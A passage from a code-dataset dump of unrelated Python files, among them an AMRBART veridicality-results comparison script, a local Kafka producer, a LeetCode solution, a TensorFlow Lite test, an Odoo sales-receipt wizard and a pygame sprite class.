positive, \"neg\": negative}\n file = pos_or_neg[key_pos_or_neg]\n\n gold = pd.read_csv(file)\n\n # load the results file\n\n # Positive results\n\n # Positive results\n\n # BART\n #\"\"\"\n bart_42 = pd.read_csv(\"../../results/veridical/predictions/pos/text/Bart_veridicality_nor_results_15175.csv\") #AMRBART_veridicality_pos_text_3036.csv\")#\"BART_17_verid_neg_3036.csv\")\n bart_17 = pd.read_csv(\"../../results/veridical/predictions/pos/text/BART_17_verid_pos_3036.csv\") #AMRBART_17_veridicality_pos_text_2277.csv\")#\"BART_17_verid_neg_3036.csv\")\n bart_67 = pd.read_csv(\"../../results/veridical/predictions/pos/text/BART_67_verid_pos_4554.csv\")\n\n # AMRBART Text\n results_42 = pd.read_csv(\"../../results/veridical/predictions/pos/text/amrbart_text_42_tokenizer_pos_3036.csv\") #AMRBART_veridicality_pos_text_3036.csv\")#\"BART_17_verid_neg_3036.csv\")\n results_17 = pd.read_csv(\"../../results/veridical/predictions/pos/text/amrbart_text_17_tokenizer_pos_2277.csv\") #AMRBART_17_veridicality_pos_text_2277.csv\")#\"BART_17_verid_neg_3036.csv\")\n results_67 = pd.read_csv(\"../../results/veridical/predictions/pos/text/amrbart_text_67_tokenizer_pos_5313.csv\") #AMRBART_67_veridicality_pos_text_5313.csv\")#\"BART_67_verid_neg_4554.csv\")#\"Bart_veridicality_neg_results_15175.csv\")\n\n # Graph\n results_42_graph_only = pd.read_csv(\n \"../../results/veridical/predictions/pos/graph/amrbart_graph_42_graph_tokenizer_pos_2277.csv\")\n results_17_graph_only = pd.read_csv(\n \"../../results/veridical/predictions/pos/graph/amrbart_graph_17_graph_tokenizer_pos_3036.csv\") #AMRBART_17_veridicality_pos_graph_only_3036.csv\")\n results_67_graph_only = pd.read_csv(\n \"../../results/veridical/predictions/pos/graph/amrbart_graph_67_graph_tokenizer_pos_3795.csv\") #AMRBART_67_veridicality_pos_graph_only_3795.csv\")\n\n # Joint\n results_42_joint = pd.read_csv(\n \"../../results/veridical/predictions/pos/joint/amrbart_joint_42_tokenizer_pos_6072.csv\") #AMRBART_verid_joint_pos_7590.csv\")\n results_17_joint = pd.read_csv(\n \"../../results/veridical/predictions/pos/joint/amrbart_joint_17_tokenizer_pos_6072.csv\") #AMRBART_17_verid_joint_pos_5313.csv\")\n results_67_joint = pd.read_csv(\n \"../../results/veridical/predictions/pos/joint/amrbart_joint_67_tokenizer_pos_7590.csv\") #AMRBART_67_verid_joint_pos_5313.csv\")\n #\"\"\"\n # Text # neg\n\n \"\"\"\n # BART\n bart_42 = pd.read_csv(\"../results/veridical/predictions/neg/text/Bart_veridicality_neg_results_15175.csv\") #AMRBART_veridicality_neg_text_3036.csv\")#\"BART_17_verid_neg_3036.csv\")\n bart_17 = pd.read_csv(\"../results/veridical/predictions/neg/text/BART_17_verid_neg_3036.csv\")#\"BART_17_verid_neg_3036.csv\")\n bart_67 = pd.read_csv(\"../results/veridical/predictions/neg/text/BART_67_verid_neg_4554.csv\")\n\n # AMRBART Text\n results_42 = pd.read_csv(\"../results/veridical/predictions/neg/text/amrbart_text_42_tokenizer_neg_3036.csv\") #AMRBART_veridicality_neg_text_3036.csv\")#\"BART_17_verid_neg_3036.csv\")\n results_17 = pd.read_csv(\"../results/veridical/predictions/neg/text/amrbart_text_17_tokenizer_neg_2277.csv\")#\"BART_17_verid_neg_3036.csv\")\n results_67 = pd.read_csv(\"../results/veridical/predictions/neg/text/amrbart_text_67_tokenizer_neg_5313.csv\")#\"BART_67_verid_neg_4554.csv\")#\"Bart_veridicality_neg_results_15175.csv\")\n\n # Graph\n results_42_graph_only = pd.read_csv(\"../results/veridical/predictions/neg/graph/amrbart_graph_42_graph_tokenizer_neg_2277.csv\")\n results_17_graph_only = 
pd.read_csv(\"../results/veridical/predictions/neg/graph/amrbart_graph_17_graph_tokenizer_neg_3036.csv\")\n results_67_graph_only = pd.read_csv(\"../results/veridical/predictions/neg/graph/amrbart_graph_67_graph_tokenizer_neg_3795.csv\")\n\n # Joint\n results_42_joint = pd.read_csv(\"../results/veridical/predictions/neg/joint/amrbart_joint_42_tokenizer_neg_6072.csv\") # AMRBART_verid_joint_neg_7590.csv\")\n results_17_joint = pd.read_csv(\"../results/veridical/predictions/neg/joint/amrbart_joint_17_tokenizer_neg_6072.csv\") # AMRBART_17_verid_joint_neg_5313.csv\")\n results_67_joint = pd.read_csv(\"../results/veridical/predictions/neg/joint/amrbart_joint_67_tokenizer_neg_7590.csv\") # AMRBART_67_verid_joint_neg_5313.csv\")\n \"\"\"\n #print(results.head())\n #df.rename(index={0:\"Index\", 1:\"label\"})\n\n # BART\n bart_res42_failed, bart_predictions_42, bart_indices_42 = indepth_results_failed(gold, bart_42, indices_dict[indices_key])\n bart_res17_failed, bart_predictions_17, bart_indices_17 = indepth_results_failed(gold, bart_17, indices_dict[indices_key])\n bart_res67_failed, bart_predictions_67, bart_indices_67 = indepth_results_failed(gold, bart_67, indices_dict[indices_key])\n\n\n res42_failed, predictions_42, indices_42 = indepth_results_failed(gold, results_42, indices_dict[indices_key])\n res17_failed, predictions_17, indices_17 = indepth_results_failed(gold, results_17, indices_dict[indices_key])\n res67_failed, predictions_67, indices_67 = indepth_results_failed(gold, results_67, indices_dict[indices_key])\n # graph\n res42_failed_graph_only, predictions_42_graph, indices_42_graph = indepth_results_failed(gold, results_42_graph_only, indices_dict[indices_key])\n res17_failed_graph_only, predictions_17_graph, indices_17_graph = indepth_results_failed(gold, results_17_graph_only, indices_dict[indices_key])\n res67_failed_graph_only, predictions_67_graph, indices_67_graph = indepth_results_failed(gold, results_67_graph_only, indices_dict[indices_key])\n # joint\n results_42_joint_failed, predictions_42_joint, indices_42_joint = indepth_results_failed(gold, results_42_joint, indices_dict[indices_key])\n results_17_joint_failed, predictions_17_joint, indices_17_joint = indepth_results_failed(gold, results_17_joint, indices_dict[indices_key])\n results_67_joint_failed, predictions_67_joint, indices_67_joint = indepth_results_failed(gold, results_67_joint, indices_dict[indices_key])\n\n # successfull instances\n # BART\n bart_res42_succed, bart_predictions_42, bart_indices_42_succed = indepth_results_succed(gold, bart_42, indices_dict[indices_key])\n bart_res17_succed, bart_predictions_17, bart_indices_17_succed = indepth_results_succed(gold, bart_17, indices_dict[indices_key])\n bart_res67_succed, bart_predictions_67, bart_indices_67_succed = indepth_results_succed(gold, bart_67, indices_dict[indices_key])\n\n res42_succed, predictions_42, indices_42_succed = indepth_results_failed(gold, results_42, indices_dict[indices_key])\n res17_succed, predictions_17, indices_17_succed = indepth_results_failed(gold, results_17, indices_dict[indices_key])\n res67_succed, predictions_67, indices_67_succed = indepth_results_failed(gold, results_67, indices_dict[indices_key])\n # graph\n res42_succed_graph_only, predictions_42_graph, indices_42_graph_succed = indepth_results_failed(gold, results_42_graph_only, indices_dict[indices_key])\n res17_succed_graph_only, predictions_17_graph, indices_17_graph_succed = indepth_results_failed(gold, results_17_graph_only, indices_dict[indices_key])\n 
res67_succed_graph_only, predictions_67_graph, indices_67_graph_succed = indepth_results_failed(gold, results_67_graph_only, indices_dict[indices_key])\n    # joint\n    results_42_joint_succed, predictions_42_joint, indices_42_joint_succed = indepth_results_failed(gold, results_42_joint, indices_dict[indices_key])\n    results_17_joint_succed, predictions_17_joint, indices_17_joint_succed = indepth_results_failed(gold, results_17_joint, indices_dict[indices_key])\n    results_67_joint_succed, predictions_67_joint, indices_67_joint_succed = indepth_results_failed(gold, results_67_joint, indices_dict[indices_key])\n\n    bart_success = bart_res42_succed + bart_res17_succed + bart_res67_succed\n    text_success = res42_succed + res17_succed + res67_succed\n    graph_success = res42_succed_graph_only + res17_succed_graph_only + res67_succed_graph_only\n    joint_success = results_42_joint_succed + results_17_joint_succed + results_67_joint_succed\n\n    bart_success_length_prem = sum([len(i[1]) for i in bart_success]) / len(bart_success)\n    text_success_length_prem = sum([len(i[1]) for i in text_success]) / len(text_success)\n    graph_success_length_prem = sum([len(i[1]) for i in graph_success]) / len(graph_success)\n    joint_success_length_prem = sum([len(i[1]) for i in joint_success]) / len(joint_success)\n\n    bart_success_length_hypo = sum([len(i[2]) for i in bart_success]) / len(bart_success)\n    text_success_length_hypo = sum([len(i[2]) for i in text_success]) / len(text_success)\n    graph_success_length_hypo = sum([len(i[2]) for i in graph_success]) / len(graph_success)\n    joint_success_length_hypo = sum([len(i[2]) for i in joint_success]) / len(joint_success)\n\n    print(\" ---- SUCCESS ----\")\n    print(\"BART successful premise length: \", round(bart_success_length_prem, 2))\n    print(\"AMRBART Text successful premise length: \", round(text_success_length_prem, 2))\n    print(\"AMRBART Graph successful premise length: \", round(graph_success_length_prem, 2))\n    print(\"AMRBART Joint successful premise length: \", round(joint_success_length_prem, 2))\n    print(\"\\n\")\n    print(\"BART successful hypo length: \", round(bart_success_length_hypo, 2))\n    print(\"AMRBART Text successful hypo length: \", round(text_success_length_hypo, 2))\n    print(\"AMRBART Graph successful hypo length: \", round(graph_success_length_hypo, 2))\n    print(\"AMRBART Joint successful hypo length: \", round(joint_success_length_hypo, 2))\n\n\n    bart_failed = bart_res42_failed + bart_res17_failed + bart_res67_failed\n    text_failed = res42_failed + res17_failed + res67_failed\n    graph_failed = res42_failed_graph_only + res17_failed_graph_only + res67_failed_graph_only\n    joint_failed = results_42_joint_failed + results_17_joint_failed + results_67_joint_failed\n\n    bart_failed_length_prem = sum([len(i[1]) for i in bart_failed]) / len(bart_failed)\n    text_failed_length_prem = sum([len(i[1]) for i in text_failed]) / len(text_failed)\n    graph_failed_length_prem = sum([len(i[1]) for i in graph_failed]) / len(graph_failed)\n    joint_failed_length_prem = sum([len(i[1]) for i in joint_failed]) / len(joint_failed)\n\n    bart_failed_length_hypo = sum([len(i[2]) for i in bart_failed]) / len(bart_failed)\n    text_failed_length_hypo = sum([len(i[2]) for i in text_failed]) / len(text_failed)\n    graph_failed_length_hypo = sum([len(i[2]) for i in graph_failed]) / len(graph_failed)\n    joint_failed_length_hypo = sum([len(i[2]) for i in joint_failed]) / len(joint_failed)\n\n    print(\"\\n ---- FAILED ----\")\n    print(\"BART failed premise length: \", round(bart_failed_length_prem, 2))\n    print(\"AMRBART 
Text failed premise length: \", round(text_failed_length_prem, 2))\n    print(\"AMRBART Graph failed premise length: \", round(graph_failed_length_prem, 2))\n    print(\"AMRBART Joint failed premise length: \", round(joint_failed_length_prem, 2))\n    print(\"\\n\")\n    print(\"BART failed hypo length: \", round(bart_failed_length_hypo, 2))\n    print(\"AMRBART Text failed hypo length: \", round(text_failed_length_hypo, 2))\n    print(\"AMRBART Graph failed hypo length: \", round(graph_failed_length_hypo, 2))\n    print(\"AMRBART Joint failed hypo length: \", round(joint_failed_length_hypo, 2))\n\n\n\n    # BART\n    bart_res42_failed_tuples = [tuple(lst) for lst in bart_res42_failed]\n    bart_res17_failed_tuples = [tuple(lst) for lst in bart_res17_failed]\n    bart_res67_failed_tuples = [tuple(lst) for lst in bart_res67_failed]\n\n    res42_failed_tuples = [tuple(lst) for lst in res42_failed]\n    res17_failed_tuples = [tuple(lst) for lst in res17_failed]\n    res67_failed_tuples = [tuple(lst) for lst in res67_failed]\n    # graph\n    res42_failed_tuples_graph_only = [tuple(lst) for lst in res42_failed_graph_only]\n    res17_failed_tuples_graph_only = [tuple(lst) for lst in res17_failed_graph_only]\n    res67_failed_tuples_graph_only = [tuple(lst) for lst in res67_failed_graph_only]\n    # joint\n    res42_failed_tuples_joint = [tuple(lst) for lst in results_42_joint_failed]\n    res17_failed_tuples_joint = [tuple(lst) for lst in results_17_joint_failed]\n    res67_failed_tuples_joint = [tuple(lst) for lst in results_67_joint_failed]\n\n    # success\n    # BART\n    bart_res42_success_tuples = [tuple(lst) for lst in bart_res42_succed]\n    bart_res17_success_tuples = [tuple(lst) for lst in bart_res17_succed]\n    bart_res67_success_tuples = [tuple(lst) for lst in bart_res67_succed]\n\n    res42_success_tuples = [tuple(lst) for lst in res42_succed]\n    res17_success_tuples = [tuple(lst) for lst in res17_succed]\n    res67_success_tuples = [tuple(lst) for lst in res67_succed]\n    # graph\n    res42_success_tuples_graph_only = [tuple(lst) for lst in res42_succed_graph_only]\n    res17_success_tuples_graph_only = [tuple(lst) for lst in res17_succed_graph_only]\n    res67_success_tuples_graph_only = [tuple(lst) for lst in res67_succed_graph_only]\n    # joint\n    res42_success_tuples_joint = [tuple(lst) for lst in results_42_joint_succed]\n    res17_success_tuples_joint = [tuple(lst) for lst in results_17_joint_succed]\n    res67_success_tuples_joint = [tuple(lst) for lst in results_67_joint_succed]\n\n\n    # BART\n    bart_res42_failed_set = set(bart_res42_failed_tuples)\n    bart_res17_failed_set = set(bart_res17_failed_tuples)\n    bart_res67_failed_set = set(bart_res67_failed_tuples)\n\n    res42_failed_set = set(res42_failed_tuples)\n    res17_failed_set = set(res17_failed_tuples)\n    res67_failed_set = set(res67_failed_tuples)\n    # graph\n    res42_failed_set_graph_only = set(res42_failed_tuples_graph_only)\n    res17_failed_set_graph_only = set(res17_failed_tuples_graph_only)\n    res67_failed_set_graph_only = set(res67_failed_tuples_graph_only)\n    # joint\n    res42_failed_set_joint = set(res42_failed_tuples_joint)\n    res17_failed_set_joint = set(res17_failed_tuples_joint)\n    res67_failed_set_joint = set(res67_failed_tuples_joint)\n\n    # success\n    # BART (kept in their own variables so the AMRBART text sets below do not overwrite them)\n    bart_res42_correct_set = set(bart_res42_success_tuples)\n    bart_res17_correct_set = set(bart_res17_success_tuples)\n    bart_res67_correct_set = set(bart_res67_success_tuples)\n    # amrbart text\n    res42_correct_set = set(res42_success_tuples)\n    res17_correct_set = set(res17_success_tuples)\n    res67_correct_set = set(res67_success_tuples)\n    # graph\n    res42_correct_set_graph_only = 
set(res42_success_tuples_graph_only)\n    res17_correct_set_graph_only = set(res17_success_tuples_graph_only)\n    res67_correct_set_graph_only = set(res67_success_tuples_graph_only)\n    # joint\n    res42_correct_set_joint = set(res42_success_tuples_joint)\n    res17_correct_set_joint = set(res17_success_tuples_joint)\n    res67_correct_set_joint = set(res67_success_tuples_joint)\n\n    indices_bart = bart_indices_42.intersection(bart_indices_17, bart_indices_67)\n    indices_text = indices_42.intersection(indices_17, indices_67)\n    indices_graph = indices_42_graph.intersection(indices_17_graph, indices_67_graph)\n    indices_joint = indices_42_joint.intersection(indices_17_joint, indices_67_joint)\n\n    unified_predictions_bart = [[i,j,k] for i,j,k in zip(bart_predictions_42, bart_predictions_17, bart_predictions_67)]\n    print(\"unified preds: \", unified_predictions_bart)\n\n\n    print(\"\\n\")\n\n    print(\"Length of errors sets (BART): {}, {}, {} Sum: {}\".format(len(bart_res42_failed_set), len(bart_res17_failed_set),\n            len(bart_res67_failed_set), len(bart_res42_failed_set) + len(bart_res17_failed_set) + len(bart_res67_failed_set)))\n\n\n    print(\"\\n Length of errors sets (text): {}, {}, {} Sum: {}\".format(len(res42_failed_set), len(res17_failed_set),\n            len(res67_failed_set), len(res42_failed_set) + len(res17_failed_set) + len(res67_failed_set)))\n\n    print(\"\\n Length of errors sets (graph): {}, {}, {} Sum: {}\".format(len(res42_failed_set_graph_only),\n            len(res17_failed_set_graph_only),\n            len(res67_failed_set_graph_only), len(res42_failed_set_graph_only)+len(res17_failed_set_graph_only)+len(res67_failed_set_graph_only)))\n\n    print(\"\\n Length of errors sets (joint): {}, {}, {} Sum: {}\".format(len(res42_failed_set_joint),\n            len(res17_failed_set_joint),\n            len(res67_failed_set_joint), len(res42_failed_set_joint)+len(res17_failed_set_joint)+len(res67_failed_set_joint)))\n\n    print(\"\\n\")\n    # NOTE: per-model unified prediction/index lists are not built here, so the BART ones are reused below\n    print_errors_and_predictions(\"Common Errors BART\", bart_res42_failed_set.intersection(bart_res17_failed_set, bart_res67_failed_set), unified_predictions_bart, indices_bart)\n    print(\"\\n\")\n    print_errors_and_predictions(\"Common Errors AMRBART Text\",\n            res42_failed_set.intersection(res17_failed_set, res67_failed_set),\n            unified_predictions_bart, indices_bart)\n    print(\"\\n\")\n    print_errors_and_predictions(\"Common Errors AMRBART Graph\",\n            res42_failed_set_graph_only.intersection(res17_failed_set_graph_only, res67_failed_set_graph_only),\n            unified_predictions_bart, indices_bart)\n    print(\"\\n\")\n    print_errors_and_predictions(\"Common Errors AMRBART Joint\",\n            res42_failed_set_joint.intersection(res17_failed_set_joint, res67_failed_set_joint),\n            unified_predictions_bart, indices_bart)\n    #\"\"\"\n    print(\"\\n Common Errors BART: \\n\", *bart_res42_failed_set.intersection(bart_res17_failed_set, bart_res67_failed_set), sep=\"\\n\")\n    print(\"\\n Common Errors Text: \\n\", *res42_failed_set.intersection(res17_failed_set, res67_failed_set), sep=\"\\n\")\n    print(\"\\n Common Errors Graph: \\n\", *res42_failed_set_graph_only.intersection(res17_failed_set_graph_only, res67_failed_set_graph_only), sep=\"\\n\")\n    print(\"\\n Common Errors Joint: \\n\",\n            *res42_failed_set_joint.intersection(res17_failed_set_joint, res67_failed_set_joint), sep=\"\\n\")\n\n\n    print(\"\\n Correct Instances Joint: \\n\",\n            *res42_correct_set_joint.intersection(res17_correct_set_joint, res67_correct_set_joint), sep=\"\\n\")\n\n    #print(\"\\n Common Errors Joint: \\n\", *res42_failed_set_joint.intersection(res17_failed_set_joint, res67_failed_set_joint), 
sep=\"\\n\")\n\n \"\"\"\n\n model_set_bart = bart_res42_failed_set.intersection(bart_res17_failed_set, bart_res67_failed_set)\n model_set_1 = res42_failed_set.intersection(res17_failed_set, res67_failed_set)\n model_set_2 = res42_failed_set_graph_only.intersection(res17_failed_set_graph_only, res67_failed_set_graph_only)\n model_set_3 = res42_failed_set_joint.intersection(res17_failed_set_joint, res67_failed_set_joint)\n\n intersection_between_models = model_set_bart & model_set_1 & model_set_2 & model_set_3 # model_set_1.intersection(model_set_2)\n intersection_between_indices = indices_bart & indices_text & indices_graph & indices_joint\n\n print(len(intersection_between_models), len(intersection_between_indices))\n #print(\"\\n Intersection of common errors: \\n\", *intersection_between_models, sep=\"\\n\")\n for instance, idx in zip(intersection_between_models, intersection_between_indices):\n print(instance, idx)\n print(\"Bart 42: \", bart_predictions_42[idx])\n print(\"Bart 17: \", bart_predictions_17[idx])\n print(\"Bart 67: \", bart_predictions_67[idx])\n\n print(\"Text 42: \", predictions_42[idx])\n print(\"Text 17: \", predictions_17[idx])\n print(\"Text 67: \", predictions_67[idx])\n\n print(\"Graph 42: \", predictions_42_graph[idx])\n print(\"Graph 17: \", predictions_17_graph[idx])\n print(\"Graph 67: \", predictions_67_graph[idx])\n\n print(\"Joint 42: \", predictions_42_joint[idx])\n print(\"Joint 17: \", predictions_17_joint[idx])\n print(\"Joint 67: \", predictions_67_joint[idx])\n\n\n print(\"Text 42: \", predictions_42)\n print(\"Text 17: \", predictions_17)\n print(\"Text 67: \", predictions_67)\n\n\n print(\"Graph 42 \", predictions_42_graph)\n print(\"Graph 17 \",predictions_17_graph)\n print(\"Graph 67 \",predictions_67_graph)\n\n print(\"Joint 42 \",predictions_42_joint)\n print(\"Joint 17 \",predictions_17_joint)\n print(\"Joint 67 \",predictions_67_joint)\n #\"\"\"\n\n\n\n\n\n\n\n","repo_name":"PhMeier/MA_Thesis","sub_path":"evaluation/classification/compare_veridicality_results_per_signature.py","file_name":"compare_veridicality_results_per_signature.py","file_ext":"py","file_size_in_byte":25884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38408047688","text":"from kafka import KafkaProducer\nimport time\n#pip3 install kafka-python\n\ndef main():\n\n producer = KafkaProducer(bootstrap_servers='localhost:9092')\n file = open(\"/home/hduser/hive/data/custs\",\"r\")\n filedata = file.readlines()\n for line in filedata:\n producer.send('my_topic', value=bytes(line,'utf-8'))\n producer.flush()\n print(\"Pushed\")\n time.sleep(3)\n \n \nmain()","repo_name":"inceptez27/pysparkworkouts","sub_path":"src/kafkaops/kproducer.py","file_name":"kproducer.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"4295797231","text":"from typing import List\nclass Solution:\n def plusOne(self, digits: List[int]) -> List[int]:\n integer_from_array = int(\"\".join(str(e) for e in digits))\n incremented_integer = integer_from_array + 1\n new_array = [int(i) for i in str(incremented_integer)]\n return new_array\n\n\n# Running in terminal/console:\nif __name__ == '__main__':\n Instant = Solution()\n Solve = Instant.plusOne(digits = [1,2,3]) # digits = [1,2,3] ->[1,2,4] | digits = [4,3,2,1] -> [4,3,2,2]\n print(Solve)\n","repo_name":"aurimas13/Solutions-To-Problems","sub_path":"LeetCode/Python Solutions/Plus 
One/plus_one.py","file_name":"plus_one.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"63"} +{"seq_id":"10433102012","text":"#!/usr/bin/env python\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nconfig = {\n 'description': '<%= projectName %>',\n 'author': '<%= author %>',\n 'url': '<%= downloadUrl %>',\n 'download_url': '<%= downloadUrl %>',\n 'author_email': '<%= email %>',\n 'version': '0.0.1',\n 'install_requires': [],\n 'packages': ['<%= projectName %>'],\n 'scripts': [],\n 'name': '<%= projectName %>'\n}\n\nsetup(**config)\n","repo_name":"danie1cohen/generator-python-project","sub_path":"generators/app/templates/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"13138279146","text":"class Alumno:\n\n def __init__(self,nombre,nota) -> None:\n self.nombre=nombre\n self.nota=nota\n\n def aprobado(self):\n if self.nota >= 6:\n print(f'{self.nombre} ha aprobado con una nota de {self.nota}')\n else:\n print(f'{self.nombre} ha desaprobado con una nota de {self.nota}')\n\nalumno1= Alumno('Alfredo',8)\nalumno1.aprobado()","repo_name":"andres408/openbootcamp","sub_path":"alumno.py","file_name":"alumno.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23711625272","text":"import numpy as np\nprint('numpy:', np.__version__)\n\n# import tensorflow as tf\n# print('tensroflow:', tf.__version__)\n\n# from tensorflow import keras\n# print('keras:', keras.__version__)\n\nimport tensorflow.lite as tflite\n#print('tflite:', tflite.__version__)\n\n\nsample_input = np.array(np.load('image_20210410181812.npy', allow_pickle=True)[94:594, 236:736, :]/255.0, dtype=np.float32)\nsample_input = np.reshape(sample_input, [1, 500, 500, 3])\nprint('image loaded as', sample_input.shape, type(sample_input))\n\ninterpreter = tflite.Interpreter(model_path='model-202104182124.tflite')\nprint('interpreter loaded', type(interpreter))\n\ninterpreter.allocate_tensors()\n\n# Get input and output tensors.\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\nprint(input_details)\nprint(output_details)\n\n# Test the model on random input data.\ninterpreter.set_tensor(input_details[0]['index'], sample_input)\n\ninterpreter.invoke()\n\n# The function `get_tensor()` returns a copy of the tensor data.\n# Use `tensor()` in order to get a pointer to the tensor.\noutput_data = interpreter.get_tensor(output_details[0]['index'])\nprint(output_data)\n","repo_name":"LiamAkkerman/Jar-Vision-System","sub_path":"pi/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6826858492","text":"import pandas as pd\nfrom datetime import datetime\nfrom matplotlib import pyplot as plt\n\nplt.rcParams[\"figure.figsize\"] = [5, 6]\nplt.rcParams[\"figure.autolayout\"] = True\n\nheaders = ['Tag', 'Start', 'End', 'Mean', 'Min', 'Max', 'Std', 'Cnt']\ndf = pd.read_csv('C:/Users/User/Documents/MS-Projects/test/test.csv', parse_dates=True, names=headers)\ndf['Start'] = df['Start'].map(lambda x: datetime.strptime(str(x), '%Y-%m-%d %H:%M:%S'))\nprint(df)\nnames = 
['Function2','{}Function2']\ndf=df[df.Tag.isin(names)]\ndf = df.pivot(index='Start', columns='Tag', values='Mean')\ndf.plot()\nplt.show()\n","repo_name":"venkateshatchutha/AVRBank","sub_path":"chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16782465108","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import date\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError\n\n\nclass sell_receipt_wizard(models.TransientModel):\n _name = 'sell.receipt.wizard'\n _description = u'销售收款一览表向导'\n\n @api.model\n def _default_date_start(self):\n return self.env.user.company_id.start_date\n\n @api.model\n def _default_date_end(self):\n return date.today()\n\n date_start = fields.Date(u'开始日期', default=_default_date_start,\n help=u'报表汇总的开始日期,默认为公司启用日期')\n date_end = fields.Date(u'结束日期', default=_default_date_end,\n help=u'报表汇总的结束日期,默认为当前日期')\n c_category_id = fields.Many2one('core.category', u'客户类别',\n domain=[('type', '=', 'customer')],\n context={'type': 'customer'},\n help=u'按指定客户类别进行统计')\n partner_id = fields.Many2one('partner', u'客户',\n help=u'按指定客户进行统计')\n user_id = fields.Many2one('res.users', u'销售员',\n help=u'按指定销售员进行统计')\n warehouse_id = fields.Many2one('warehouse', u'仓库',\n help=u'按指定仓库进行统计')\n company_id = fields.Many2one(\n 'res.company',\n string=u'公司',\n change_default=True,\n default=lambda self: self.env['res.company']._company_default_get())\n\n def _get_domain(self):\n '''返回wizard界面上条件'''\n cond = [('date', '>=', self.date_start),\n ('date', '<=', self.date_end),\n ('state', '=', 'done')]\n if self.c_category_id:\n cond.append(\n ('partner_id.c_category_id', '=', self.c_category_id.id)\n )\n if self.partner_id:\n cond.append(('partner_id', '=', self.partner_id.id))\n if self.user_id:\n cond.append(('user_id', '=', self.user_id.id))\n if self.warehouse_id:\n cond += ['|',('warehouse_id', '=', self.warehouse_id.id),\n ('warehouse_dest_id', '=', self.warehouse_id.id)]\n return cond\n\n def _compute_receipt(self, delivery):\n '''计算该发货单的已收款'''\n receipt = 0\n for order in self.env['money.order'].search(\n [('state', '=', 'done')], order='name'):\n for source in order.source_ids:\n if source.name.name == delivery.name:\n receipt += source.this_reconcile\n return receipt\n\n def _prepare_sell_receipt(self, delivery):\n '''对于传入的发货单/退货单,为创建销售收款一览表准备数据'''\n self.ensure_one()\n factor = delivery.is_return and -1 or 1 # 如果是退货则金额均取反\n sell_amount = factor * (delivery.discount_amount + delivery.amount)\n discount_amount = factor * delivery.discount_amount\n amount = factor * delivery.amount\n partner_cost = factor * delivery.partner_cost\n order_type = not delivery.is_return and u'普通销售' or u'销售退回'\n warehouse = not delivery.is_return and delivery.warehouse_id or delivery.warehouse_dest_id\n # 计算该发货单的已收款\n receipt = self._compute_receipt(delivery)\n # 计算回款率\n receipt_rate = (amount + partner_cost) != 0 and (receipt / (amount + partner_cost)) * 100 or 0\n return {\n 'c_category_id': delivery.partner_id.c_category_id.id,\n 'partner_id': delivery.partner_id.id,\n 'user_id': delivery.user_id.id,\n 'type': order_type,\n 'date': delivery.date,\n 'order_name': delivery.name,\n 'warehouse_id': warehouse.id,\n 'sell_amount': sell_amount,\n 'discount_amount': discount_amount,\n 'amount': amount,\n 'partner_cost': partner_cost,\n 'receipt': receipt,\n 'balance': amount + partner_cost - receipt,\n 'receipt_rate': receipt_rate,\n 'note': delivery.note,\n }\n\n 
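# A worked example of the receipt_rate formula above, with purely\n    # illustrative numbers (not taken from any real order): amount=800,\n    # partner_cost=200 and receipt=500 give 500 / (800 + 200) * 100 = 50.0,\n    # while amount + partner_cost == 0 makes the and/or chain fall back to 0\n    # instead of dividing by zero.\n    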
@api.multi\n def button_ok(self):\n self.ensure_one()\n res = []\n if self.date_end < self.date_start:\n raise UserError(u'开始日期不能大于结束日期!\\n 所选的开始日期:%s 结束日期:%s'%(self.date_start, self.date_end))\n\n delivery_obj = self.env['sell.delivery']\n for delivery in delivery_obj.search(self._get_domain(), order='partner_id'):\n # 用查找到的发货单信息来创建一览表\n line = self.env['sell.receipt'].create(\n self._prepare_sell_receipt(delivery))\n res.append(line.id)\n\n return {\n 'name': u'销售收款一览表',\n 'view_mode': 'tree',\n 'res_model': 'sell.receipt',\n 'type': 'ir.actions.act_window',\n 'domain': [('id', 'in', res)],\n 'limit': 65535,\n }\n","repo_name":"cndn/intelligent-code-completion","sub_path":"raw_data/44384_sell_receipt_wizard.py","file_name":"44384_sell_receipt_wizard.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"} +{"seq_id":"9272003936","text":"import pygame\nimport os\nimport constantes\nimport random\n\n\nclass TelaInicio(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imagens_bola = []\n self.carregar_arquivos()\n tamanho = random.randrange(16, 32)\n for i in range(8):\n imagem = self.sprite_sheet_bola.subsurface((i*32, 0), (32, 32))\n imagem = pygame.transform.scale(imagem, (tamanho, tamanho))\n self.imagens_bola.append(imagem)\n self.index_lista = 0\n self.image = self.imagens_bola[self.index_lista]\n self.rect = self.image.get_rect()\n self.mask = pygame.mask.from_surface(self.image)\n self.rect.center = (random.randrange(\n 0, constantes.LARGURA_TELA), constantes.ALTURA_TELA)\n\n def update(self):\n self.rect.y += -1\n if self.rect.bottomleft[1] <= 0 or self.rect.collidepoint(pygame.mouse.get_pos()):\n self.kill()\n if self.index_lista > 7:\n self.index_lista = 0\n self.index_lista += 0.25\n self.image = self.imagens_bola[int(self.index_lista)]\n\n def carregar_arquivos(self):\n # Carrega as imagens correspondentes a classe Bola\n diretorio_imagens_bola = os.path.join(os.getcwd(), 'imagens')\n self.sprite_sheet_bola = pygame.image.load(os.path.join(\n 